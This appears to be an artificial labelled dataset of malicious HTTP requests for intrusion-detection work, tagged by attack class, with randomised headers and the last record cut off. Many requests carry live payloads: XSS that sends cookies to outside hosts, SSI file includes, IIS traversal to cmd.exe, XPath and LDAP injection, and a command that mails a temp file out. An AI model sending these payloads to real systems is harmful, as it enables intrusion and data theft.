User-Agent: tkCRGl http://www.Svdeuh.ch
UA-Disp: 3713,1872,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: FTP/0.3 57.254.8.61:69695, HTTP/8.6 74.174.21.134
Transfer-Encoding: identity
Upgrade: pt5etn/1.8, Epd/4.6, nuba/1.0, kixdml/0.4, fecwi/7.2
X-Forwarded-For: 126.226.47.150
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

J5Nnin=OR     '8ub'    BETWEEN    'R'    AND    'T'&lge4cdoeee=dotwydIetep7&aNta=psYNs6rsoh]r a&Cj1aeIrhghn=t8nieait j&epDo=vrusgavbscripttreanEwsock_streamc&Oahrqaesdnaea=3901326186&yeag=D&0&ay=mg6sdee&htpassIyYC3=981

End - Id: 35142
Start - Id: 39534
class: SSI
GET /eeA67kiaprn/hPR7wgK@lFGG/nEdbeolk/8CidsamTd8orD/lWCgOgbx/AtetdarI/vxLiPzTlHvMCp5kF/olcetsantciyde/zjkL0r9Zga.J.gif?1tbf44=89&Cw=T&xn=aaomoRF5g&l6s8Ftytiy=32959659&ae8yseisso=851571736&ee3Ms2trat4on=%7C+%3F9%3Adm&dnsgaan=efgiaHg&ooanwbae4kl9nnc=ie1ytwtTroaeee&aeHjae=mioosna&Aupp=+o+&NwW9vrm=oen2Irston6&52ZYO593Z=3 HTTP/1.0
Host: www.aliit.org:80
Connection: keep-alive
Accept: text/*;q=0.1, audio/basic, video/*;q=0.6
Accept-Charset: windows-1258
Accept-Language: *
Cache-Control: min-fresh=3722
Cookie: YEgrwpnwEt=3425072;ne3xnlsHne0zirv=rIanutHq;edg0eaue5teuo=<!--  #include     virtual="/var/log/httpd/access.log"     -->
Date: Tue, 25 Sep 07 22:40:29 GMT
From: 5tmtbcct@ib5cnotvA.be
If-Unmodified-Since: Sun, 18 Mar 07 23:57:11 GMT
If-Match: "4oJl15clryp_3Zj"
If-None-Match: "P87UrECyj-hyZ3e9"
Pragma: no-cache
Referer: http://www.hsSWn.be/lodiwe.asp
TE: trailers,trailers
User-Agent: rpneaB (ow5tdT-_1; iERJmc5B; tT8-vEJFQl; hdggvK.z)
UA-Disp: 501,3420,16
UA-Pixels: 234x5347
Transfer-Encoding: identity
----: --------------------------------------

null

End - Id: 39534
Start - Id: 47362
class: XSS
GET /b9tF/nynomlio/tHES_cTC/bhodGO4NDVACPQC8EHtj.html?oaziTnsa=haUrrcp%25lsamwinnts&.Kdginclude=nr5ihisE4patI&tosl80u=%3Cstyle++++%3E%3C%21--%3C%2Fstyle++++%3E%3Cscript+%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.ieanri.com%2Fcgi-bin%2Folseti.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++%3E&oeeoj3ENTiemcr=ehttpsadcH&huebsjcqy=g%40z%2Funrdcc%28i2ai&ehctoislao=80451820&7nhaelircsk=tmpi&bp=g%3AccopybawoS0+hcatv HTTP/1.0
Host: www.jn2hs6nm7.gov
Connection: keep-alive
Accept: text/*;q=0.7, audio/*;q=0.3, video/mpeg;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: A-abbbm, rru7le-eiMuooe7
Cache-Control: only-if-cached
Client-ip: 30.118.108.110
Cookie: edmg3o=yKdY9j-diP;e3px4ln=ac;Oaweih=oq1qe;lSeI6oi=sDi;ooeantjsqef= %and
Cookie2: $Version="004"
Date: Wed, 06 Jun 07 21:40:47 GMT
ETag: W/"PjYKmUAHLLYd8gcE5"
Expect: rnyes=dheroAo;tunizx
From: Rlpr@aeautrol.org
If-Modified-Since: Fri, 30 Apr 04 01:22:52 UTC
If-Unmodified-Since: Mon, 13 Jun 05 03:06:57 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 18 Apr 10 21:15:23 GMT
Max-Forwards: 78
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM c2UzN3VhemlvaFBhdGhSc2JldHQ2YXJlZW1pTGVlZTZsN0xl
Authorization: NTLM QWdhbnNpb2xEdGVleGFibDVvcHRUY296ZW90OWw5cmZ1ZTJzOG1PQnNyc20=
Range: -773710,2145-890
Referer: /N3Ee6osm/4Rxnmwe/eceR.exe
TE: gzip
Trailer: Trailer
User-Agent: Mozilla/2.3 (Machintosh; U; PPC 5.5; cE-ET; rv:8.0.7) Gecko/08042836
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 605x5902
Via: HTTP/8.9 52.72.72.160:1770, HTTP/8.5 23.252.8.24
Transfer-Encoding: gzip
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 970 233.253.83.48 "nctm" "Thu, 06 Nov 08 08:21:23 GMT"
X-Forwarded-For: 70.187.168.143
X-Serial-Number: 0450626600564347
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47362
Start - Id: 47821
class: XSS
GET /o2cbpaKON4sBQ9UDK/tcgctjgs5kfTet/eoeeb/5sod.jsp?elorrepH9Ceofe=a5lnph-a&PChvbscriptchXvEn_p=%3Cscript+%3Ealert++%28+++%22++te3r.brvn%22%29%3C%2Fscript%3E HTTP/1.0
Host: 30.145.254.129:80
Connection: LtlBAaRn
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 147.17.73.234
Cookie: 2nra5yennme=a
Cookie2: $Version="3"
Date: Thu, 05 Aug 04 02:49:12 GMT
ETag: W/"OurwtpibD7A0noXC"
Expect: dolnme=tdvee;csddfa
From: aelcese@ohx6uolgc.ch
If-Modified-Since: Mon, 20 Sep 04 19:28:13 UTC
If-Unmodified-Since: Mon, 06 Oct 08 05:39:25 UTC
If-Match: "p-welNPhrxXlmUAh0"
If-None-Match: "HJvHbk2nRpGxH96nPX"
If-Range: "Lup-HA1c3p_VigCgcO2R"
Max-Forwards: 449
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: ae9de sesszy=lt9eEk7
Authorization: NTLM YWJvYXBzbmNuZWhrbHNlT05taHR0dHRJYWlpbktpdGlnZG1t
Range: 2820-37,-5180,81-
Referer: /dzesa/oIel.jpeg
TE: gzip;q=0.1
Trailer: TE
User-Agent: Mozilla/3.6 (Machintosh; U; Mac OS X 6.1; 7e-ss; rv:4.2.4) Gecko/86512058
UA-CPU: MIPS
UA-Disp: 9028,3177,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 907x206
Via: 3.6 www.keAeda.tiff
Transfer-Encoding: identity
Upgrade: ag4wjm/5.9, sei6/6.5, sa3/7.1, 2sodF/1.7
Warning: 325 81.170.42.32 "7FeeyLne7hiEmT" "Mon, 30 Nov 09 23:36:47 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 4290166735414174
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 47821
Start - Id: 44532
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.0eeajitl.ch
Connection: esfelE
Accept: video/*;q=0.7, image/*, image/jpeg
Accept-Charset: *;q=0.1
Accept-Encoding: compress, compress;q=0.6, identity;q=0.5, identity
Accept-Language: *
Cache-Control: min-fresh=5010
Client-ip: 106.174.171.250
Cookie: cmoidc=ohNK;hbRnisntcah=hC;hrAtrhtx7uYaro=9195366;a21gBkFeclike0=]seFskallt6t;pAew5o=asiqr4rNnE
Cookie2: $Version="79"
Date: Thu, 28 Oct 04 24:03:41 GMT
ETag: W/"gEfBmqXHD0hpIDy4@"
Expect: swso=vdlpOs
If-Modified-Since: Thu, 11 Feb 10 19:44:02 UTC
If-Unmodified-Since: Sun, 09 Jul 06 05:04:49 GMT
If-Match: *
If-None-Match: "ZBaC@EA2nBCb@.gpc5s_"
If-Range: *
Max-Forwards: 977
Pragma: no-cache
Proxy-Authorization: wOenhg wikc=uN2atn
Authorization: NTLM b2RmZW91RXl0aFBvOHllNG5hbmJnaXJoc2lyb2lld2l1YXJpaDVnbnRsZXdD
Range: 30684-
Referer: /loiT0/ajiblhhE/tsNta.tar.gz
TE: trailers
Trailer: TE
User-Agent: Mozilla/2.4 (X11; U; Unix 4.5; fc-tt; rv:0.2.2) Gecko/75215336
UA-CPU: 68000
UA-Disp: 692,7147,32
Via: 2.3 www.ari3lDE.tiff:31
Transfer-Encoding: identity
X-Forwarded-For: 49.170.176.68

null

End - Id: 44532
Start - Id: 49369
class: XPathInjection
GET /lyJb7t9@V/r9mtaeIi/IlA%uCM1e..asmx?12G5unionO82services=ia&cymcr2uvts4ii=tygnEitigr1x&lrwlcrq0fs=226&esqtao4Sm=e&0uTr4atfqh=ngYZ3_kY&EoVraWEet=nyle%27+++++or+1%3C++ecazr%2Fe7%2FtgIooI%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D48%5D++++or+++++%27siOte6%27++%3D++++%27&4TI3j9=01&twonzs=e9frmD0geWnreoc&utdhn=%27r&1nleeadT=942576 HTTP/1.1
Host: 162.91.134.5
Connection: close
Accept: video/*, video/*;q=0.5
Accept-Charset: windows-874;q=0.2
Accept-Encoding: 
Accept-Language: oo1ut7-Et
Cache-Control: only-if-cached
Client-ip: 49.219.24.88
Cookie: miu=7stUe<rlx;qi5R2cqta6mtnuy=uljvhxnu;wieEsrqii=eitr;tietotwjase2c8a=874565;ihs=ivo
Cookie2: $Version="846"
Date: Mon, 01 Mar 04 11:14:41 CET
ETag: W/"RkLd1rvasZXLUSjf"
Expect: Tuxyl=nqqhaaen;tyEptn=rc4e
From: seyi@voosa.st
If-Modified-Since: Sun, 19 Sep 04 09:56:33 GMT
If-Unmodified-Since: Sun, 22 Aug 04 17:23:31 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Oct 04 21:13:36 UTC
Max-Forwards: 165
MIME-Version: 7.0
Pragma: jgosdoiC=pe7rd
Proxy-Authorization: Digest uri=http://efar.be/thtuh/euhhew3a/theOa.conf
Authorization: aDlsB etydii=lzeah4
Range: -9178,535260-09009
Referer: /o104ps/ihlEl/nwSssE51/nedEp2/rf7oe.asp
TE: trailers,gzip;q=0.1
Trailer: Pragma
User-Agent: Mozilla/0.1 (X11; U; SunOS sun4u 7.9; eA-mg; rv:3.8.1) Gecko/99603967
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3843x971
Via: 5.7 108.109.19.177, 1.1 www.mldieo.shtml, 3ciEo/7.4 www.aeglnuNf.js:139
Transfer-Encoding: compress
Upgrade: fdzt6r/1.6, f4eN8/7.9
Warning: 136 11.147.101.120:8 "azxwWdgjetsnwgt6ecfc" "Sun, 05 Nov 06 18:36:55 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49369
Start - Id: 46446
class: PathTransversal
PUT /v1vBHo87SgP6iArDGZzK/rhkdoaua/ihioC3rk/BuCidiv5I.mspx? HTTP/1.1
Content-Length: 27
Content-Language: h,ijsnRne
Content-Encoding: deflate
Content-Location: /eotzi.shtml
Content-MD5: c3R6NHJ5YTJhdG95MG5hOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Oct 09 21:29:02 GMT
Last-Modified: Tue, 29 Aug 06 11:30:20 UTC
Host: www.SEce.biz
Connection: 32yillc
Accept: */*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: ../../../../var/log/access_log%00.html
Accept-Language: aalo-eaE
Client-ip: 252.99.144.153
Cookie: enol=eEnW
Date: Wed, 21 Oct 09 04:20:47 CET
Expect: 100-continue
From: edoar@Itnxs.uk
If-Modified-Since: Thu, 24 Mar 05 15:11:51 GMT
If-Match: *
If-None-Match: "ZJUZiDs8X5EwlcyWT"
If-Range: *
Max-Forwards: 778
Pragma: tTDilii=sojAjsem
Authorization: Digest opaque="ohEt"
Range: 8-
Referer: /EaldEc/gd4reirn/roomAns3/dtlwe/uthbmam.swf
TE: deflate
User-Agent: Mozilla/6.9 (compatible; esaoyfhn; Open BSD i386; pHrfogeod; edllitsv)
Via: Btsd/9.8 126.35.192.134, ed5jp/1.8 www.iH0sfaem.tiff
Transfer-Encoding: identity
Upgrade: ag3tre/0.1, gcSii/4.0, npn/0.2, am4soe/1.1, ml6u/2.9
X-Forwarded-For: 112.43.17.203
X-Serial-Number: 3606410233441132391

KeZX=eRo(\4&IeeJnhdx=te

End - Id: 46446
Start - Id: 44326
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 186.242.145.235:80
Connection: oAm7
Accept: */*;q=0.8
Accept-Charset: x-mac-japanese, x-mac-hebrew;q=0.1, iso-8859-5, iso-8859-9;q=0.5, euc-cn
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 82.192.157.241
Cookie: pexk=zO-HOG91k;fAEmf5olleo=pterftnf1IIwye;LVSfj70KRNZ=68530883;hIloaaggrunqm=1iWvsy;gmualoe5t=xmletei
Cookie2: $Version="72"
Date: Fri, 23 Dec 05 17:21:50 CET
ETag: "py_xbOPcEaHdMz1-"
Expect: Isdeea8T=dvor7
From: ssaaei@srTei5is.de
If-Modified-Since: Wed, 14 Oct 09 06:49:02 UTC
If-Unmodified-Since: Mon, 28 Aug 06 01:36:39 UTC
If-Match: "O@jlDoWsVVSSDyKh"
If-None-Match: *
If-Range: "KifzXthQy8DwbK-h6d"
Max-Forwards: 0
MIME-Version: 1.6
Pragma: so=tz0
Proxy-Authorization: Basic T2hsMGg6YWFhMg==
Authorization: nyblI iabisbt=fidv
Range: 88-15414
Referer: /ea2Yn.pdf
TE: deflate;q=0.5
Trailer: If-None-Match
User-Agent: Mozilla/2.2 (compatible; Konqueror/4.6; WinNT; leUe)
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 127x111
Via: 4.0 www.ttekp.shtml, FTP/3.1 224.85.199.129
Transfer-Encoding: compress
Upgrade: tzsa/1.2, i18be/3.4, iXa/9.5
Warning: 477 www.oeiseg.css:177 "oNngqeeniilu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44326
Start - Id: 35965
class: PathTransversal
GET /CzRdgAhttp.C0a6E_/VGwget6bFXfJgkZYC_/hiosDmeae8p/ttfstw0ot/ahtgttxuaaobt.png?ta=645178&tezeoartohenaic=dsc6oneeoa&ltdg6=m+eautoexecitowj+oso HTTP/1.1
Host: 190.250.87.179
Connection: close
Accept: */*;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=3065
Date: Thu, 04 Jan 07 17:48:39 UTC
If-Modified-Since: Sun, 27 May 07 23:14:33 UTC
If-Unmodified-Since: Sun, 03 Feb 08 03:04:38 CET
If-Match: *
MIME-Version: 5.5
Referer: http://www.7qjuyu.cz/fln5uka.bin
User-Agent: ..\..\..\..\..\..\WINNT\system.ini

null

End - Id: 35965
Start - Id: 49340
class: XPathInjection
GET /oJoLOmhFSqorU_B@HMqu/dNOobyQPsBZsVNeei0/0axWz4v8Kr9jNZ13y5Z1.tiff?eNeptt1=4&rdrdhv2htfzbon=%3C-tlink&mtoneoolwihrr=99391&i0t2eer27k=6725+++++or++1%3C+++++r%2Foet4ee%2Fha%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D9%5D++++or+6351%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&UVkRRexecC=servicesqa%7Chptsaaidocument&nweh=bno-Xgeehonullec8 HTTP/1.1
Host: 241.97.149.178
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: lJrNprg-e, 0sme7dc-orttise;q=0.1, s-ikhq;q=0.1, fd-o;q=0.6
Cache-Control: max-stale=1
Client-ip: 52.176.42.105
Cookie: 3jrr=netcatNanp=m9o;annPheeOgrtaS=0;I2motmed0whxe=2978958476;RAnDz=ro;4gQt=iEdrhc;v8tL_9hPTOb0=wotaO
Cookie2: $Version="0"
Date: Sat, 20 Mar 04 20:17:15 UTC
ETag: "iBFJ9mYzhquyr_gUZQz"
Expect: 100-continue
From: ilheiOI@yzloo.de
If-Modified-Since: Fri, 09 Jul 04 04:47:20 UTC
If-Unmodified-Since: Sun, 25 Sep 05 05:58:13 CET
If-Match: "wkIHvyXQR61ssp4j"
If-None-Match: "2sXxYV.Ic6rbmYH_"
If-Range: Tue, 03 May 05 02:07:54 UTC
Max-Forwards: 3679
MIME-Version: 2.9
Pragma: asga='nDo'
Proxy-Authorization: NTLM ZWxpanNqcm1TNm5JaWRyTHI4aHNobzNtVHZsdHRhb2Y4b3Jz
Authorization: Basic ZHJydWdibmk6YXRvNQ==
Range: 39-,253249-,539-99
Referer: http://Znbbyio.ch/rere/ieerrpai.shtml
TE: deflate,gzip
Trailer: From
User-Agent: Mozilla/7.0 (compatible; MSIE 0.0; Solaris; eaud; 3xeddba4n; awt30)
UA-CPU: StrongARM
UA-Disp: 396,9946,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x2070
Via: 8.8 94.76.18.108
Transfer-Encoding: gzip
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 257 184.190.147.157 "nuwa" "Wed, 25 Aug 04 17:11:36 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 27114318414424
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49340
Start - Id: 39236
class: SSI
GET /oFuuFXKL4cS7/autoexecwp-ohLDvA/eu638szpQzLJX51Yr6/t4oq/0DF1gInetcatdr/rRdXX.M/cltO/sPIjjL7Na5FsKx/oS/nph-hexecECmailta-8U_j6/kL/fo3unsgnoOei.gif?shiorv8apubeun=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&Y-bk0bEtelnet_IX=63931700&5ec3tanrwrsfgs=24Sdq5Dk HTTP/1.0
Host: 88.248.169.177
Connection: IyfDab
Accept: video/mpeg;q=0.6, application/*;q=0.8, image/*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 115.187.210.122
Cookie: aspaqs7lOloevmo=qre7estat;aiJ11=3Q_O@fZ
Cookie2: $Version="350"
Date: Thu, 16 Aug 07 02:01:16 GMT
ETag: "4WITdI0tQXVWOMUbkat"
Expect: 7a2s1
From: lyrtrai@3atnetodh4.net
If-Modified-Since: Sat, 30 Oct 04 24:45:54 GMT
If-Unmodified-Since: Tue, 05 Jun 07 14:37:29 GMT
If-Match: "Ax_Hwmw7aTiwjzh"
If-None-Match: "q6nt@fsO-01_pqWagR"
If-Range: "QEelm2mgLh-UbRfP0"
Max-Forwards: 3
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic c2ltMjpzYWdlYjVhYQ==
Authorization: Digest realm
Range: 5-9725,-6683
Referer: http://iqgauhhs.st/hSCsn/reaenm/aahoc.swf
TE: chunked;q=0.6,trailers,trailers
Trailer: Date
User-Agent: fhiOp2N/7.8.9.0.0
UA-CPU: 68000
UA-Disp: 274,6270,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 833x510
Via: 9.6 35.62.81.245
Transfer-Encoding: compress
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 173 103.13.38.123 "ncwbefh" "Tue, 25 Oct 05 02:27:19 UTC"
X-Forwarded-For: 252.9.253.184
X-Serial-Number: 157624
----: ---------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 39236
Start - Id: 37987
class: LdapInjection
GET /5V2qsMKnAoHl/ed3ar1u/etRtwt.gif?CgIjB_documentBZy=%29%28+++%7C%28cn%3D*o++%27brien*+++%29%28mail++%3D*o+%27brien*+++%29++ HTTP/1.0
Host: www.asnethe.cz
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip
Accept-Language: rrt2G-ucnnku;q=0.3, 7-pvoa3s, tporlao-l6;q=0.6, lmnrepxx-l, aooN99ri-r;q=0.3
Cache-Control: no-cache
Client-ip: 181.41.234.72
Cookie: 8uorvoda08toasj=i
Cookie2: $Version="279"
Date: Tue, 25 Apr 06 03:44:58 CET
ETag: W/"X6DZQRvQqkAgn7Mj"
Expect: 100-continue
From: ismia@jutuoqaes.be
If-Modified-Since: Wed, 11 Aug 04 15:04:12 UTC
If-Unmodified-Since: Sat, 25 Jul 09 24:58:52 UTC
If-Match: "DIrgNt38o2Ti-BleRxrL"
If-None-Match: "K8K7mnWMiM.L8t4B"
If-Range: Sun, 20 Jul 08 14:06:06 CET
Max-Forwards: 80
MIME-Version: 4.1
Pragma: eSNA='Qd'
Proxy-Authorization: Digest nc=Fe26BDc0
Authorization: Basic RWJlbjppdGV0
Range: 4893-,-7197
Referer: http://tgdaf0n5.org/q0afifj/4eeoc.asp
TE: trailers,gzip
Trailer: Warning
User-Agent: sIoqcsFd2n
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8848x2681
Via: n30rte/9.4 www.aaVio5.shtml, trsalj/8.2 www.sns5inio.gif
Transfer-Encoding: identity
Upgrade: 9aaia/6.6
Warning: 919 www.siLiann.jpg:37 "teLew" 
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37987
Start - Id: 40476
class: SSI
GET /nhrNcoRcotend/MDUZ.jpeg?eoHe=r%3Ee&tgsuaefE=m1bcVjSbST&hslZehhi3gbas=do9xYVHhXr1-&oOcrmeeeihijr2e=%3C%21--++++%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++--%3E&XMaAFMA9YS=mhj&isn=4oSihek9pdt HTTP/1.1
Host: 122.247.134.171:945
Connection: close
Accept: text/plain;q=0.9, text/plain
Accept-Charset: iso-2022-kr;q=0.3
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 207.160.226.22
Cookie: 7poRla56si=88277634
Cookie2: $Version="386"
Date: Mon, 07 Jun 04 02:16:05 UTC
ETag: W/"FGqTlYRcSn07Vq9zDb"
Expect: 100-continue
From: esoefoms@tnncodier.cz
If-Modified-Since: Wed, 23 Sep 09 23:56:41 GMT
If-Unmodified-Since: Mon, 25 Apr 05 21:29:03 CET
If-Match: "YYnZmA1wQSwgbXhJ5L"
If-None-Match: "9FKU8u_.GqW6Spnj"
If-Range: *
Max-Forwards: 4
MIME-Version: 6.5
Pragma: N=5exvoren
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: oqe28t tMiztat9=1u0r
Range: 6740-758,0802-
Referer: http://www.sqdoN.gov/ic2olLeo/tswdueio/adohnhwL/3neae.gz
TE: trailers,deflate;q=0.0,trailers
Trailer: Host
User-Agent: eands5A2mdrO
UA-CPU: PowerPC
UA-Disp: 193,8331,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 7701x851
Via: 7.7 120.165.158.146, 0.3 www.ots2g.js, uhhihe/4.2 www.ngtquefi.css:2
Transfer-Encoding: deflate
Upgrade: Fgc8t/0.2
Warning: 565 www.mo1i.jpg "difinztedvtd" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 98565372421828
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40476
Start - Id: 43822
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: www.4sdlmo6cn.com:80
Connection: dAtn
Accept: text/*;q=0.7
Accept-Charset: euc-jp
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=1640
Client-ip: 110.26.184.172
Cookie: r7t97=ioijvx4;3bsktmrreFa4t5=s;rHksIj;oovAhgixl=ttdodrenPxey;dhubssnpSeeq=EsP&;JjRMT1Y7lsKJ=777;em=TIchsareplacea ss)beeet
Cookie2: $Version="513"
Date: Thu, 04 Feb 10 05:50:14 CET
ETag: W/"-MJfZJF0gHAQgRUgxoJi"
Expect: 100-continue
From: nNdc@ioesest.fr
If-Modified-Since: Wed, 21 Apr 04 11:47:10 UTC
If-Unmodified-Since: Sun, 19 Nov 06 05:12:38 CET
If-Match: "OAeiJS.lb_lP-QM"
If-None-Match: "9nhat7-TWn@3Iy1Thkn"
If-Range: *
Max-Forwards: 724
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: nhtAee iSca=rh9xakc
Range: 7246-,-7950
Referer: /Svet/lOro1.gif
TE: deflate
Trailer: Accept
User-Agent: Mozilla/1.7 (compatible; rtqh; Mac OS X; 533inner)
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6925x167
Via: 7.3 www.eohnR.tiff, 5.2 88.65.214.58
Transfer-Encoding: compress
Upgrade: elhc/1.1, pcie/0.4, dnaa/6.7, adtya9/8.8, n0MysO/8.8
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 33.130.8.36
X-Serial-Number: 179501201
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43822
Start - Id: 48036
class: XSS
GET /dH/sa6MMO5gsYW3e9r/eh8taeEtth.bin?7mYGF=2531902105&CobjectZqatA=lvPJ-7znkN&tvr8Xcpiidl=hdehmgarbrS4tczg&asocueE6otANhv=%5B%5CxC0%5D%5B%5CxBC%5Dscript+%3E%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.chmata.com%2Fcgi-bin%2Fie.cgi%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript++++%3E&BKOsD7M1=2354528&Mastaa0rrfs=cFKzOdaK3oY HTTP/1.0
Host: www.77nbthrBer.de
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.4, iso-8859-4
Accept-Encoding: 
Accept-Language: McSap-rne;q=0.4, dotfts-er1rfeh, hqree-lyGb, 7cereezr-lEaa71;q=0.9, hj-rn4tuly;q=0.8
Cache-Control: max-age=830
Client-ip: 195.17.8.114
Cookie: GPckW=9185736;uo7uetushcN=uscriptaxmlEaa+o5et;LVUestdinOx6K5=86;nenedwcino3= atqo
Cookie2: $Version="85"
Date: Tue, 20 Sep 05 15:21:10 CET
ETag: W/".qoIWGMLllhfrRTCZtI"
Expect: 100-continue
From: uesois@ewrsoxtt.it
If-Modified-Since: Mon, 10 Jan 05 03:44:02 CET
If-Unmodified-Since: Sat, 27 Mar 04 06:26:54 UTC
If-Match: *
If-None-Match: "FxMNT_fPkXuak5Nm8"
If-Range: Mon, 19 Apr 10 24:23:51 CET
Max-Forwards: 76
MIME-Version: 4.1
Pragma: e='7ebs'
Proxy-Authorization: snos enrumt=ei1nn
Authorization: Basic Nmx3bm9oZTpFbW5vdHRj
Range: -108,-2477,99-66895
Referer: /tnxd/eAzoca/suXcMnb/tbsnenuc/onusaol.mp3
TE: gzip;q=0.3
Trailer: Accept-Charset
User-Agent: Mozilla/5.8 (Machintosh; U; PPC Mac OS X 7.0; en-ai; rv:4.0.9) Gecko/03820685
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 717x263
Via: FTP/9.9 www.7iou.jpg
Transfer-Encoding: gzip
Upgrade: odv/3.8, cye8/8.2
Warning: 409 www.nwho7d.jpeg "t6otamehitht" "Sat, 04 Sep 04 24:22:06 CET"
X-Forwarded-For: 188.45.251.30
X-Serial-Number: 698729021
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48036
Start - Id: 43586
class: OsCommanding
GET /r5zbDQL/Otosodir/mVSWEH0lvChUI6niTk/y1MJvaroK/jk6Ktmp_ZhyySxnodevQ/etbimr82mn0/gm6raeetlrdai1osndv/9p7ufKG3H8odEVuyI9lO/toTzY/378Tku_T./eQ47nNd.mdb?NxelaDk412aeerx=%27++++%3B+cat+++%2Ftmp%2Fres+++mail++++es%40retail.com++++%3B&Earse=%3BexecmnrEdocumentxe%2Bh&_Eq1=1854065&au=Fsh9lieo&oebvaepqiiwa=665518&xed=a14ssi&ThhH=IrQaim+rAeat6 HTTP/1.0
Host: www.taNkpr.gov
Connection: hldwac
Accept: audio/x-wav, image/png
Accept-Charset: macintosh, macintosh
Accept-Encoding: gzip;q=0.4
Accept-Language: k-o, trsn-si4, seicetb-ooiwai, tl-ts
Cache-Control: no-transform
Client-ip: 209.18.180.198
Cookie: HP6@xkZ=4754;UhiGC=bhpea utxy;SacsD7aaeumLiy5=nQV.gBZ;ed9gneyidsn=15525
Cookie2: $Version="9"
Date: Sun, 18 Apr 10 14:35:43 GMT
ETag: "z@VDwv-LBAonIc6"
Expect: gtmnl0e=x4oheja
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Sat, 16 Jul 05 13:47:46 UTC
If-Unmodified-Since: Tue, 19 Feb 08 15:32:06 CET
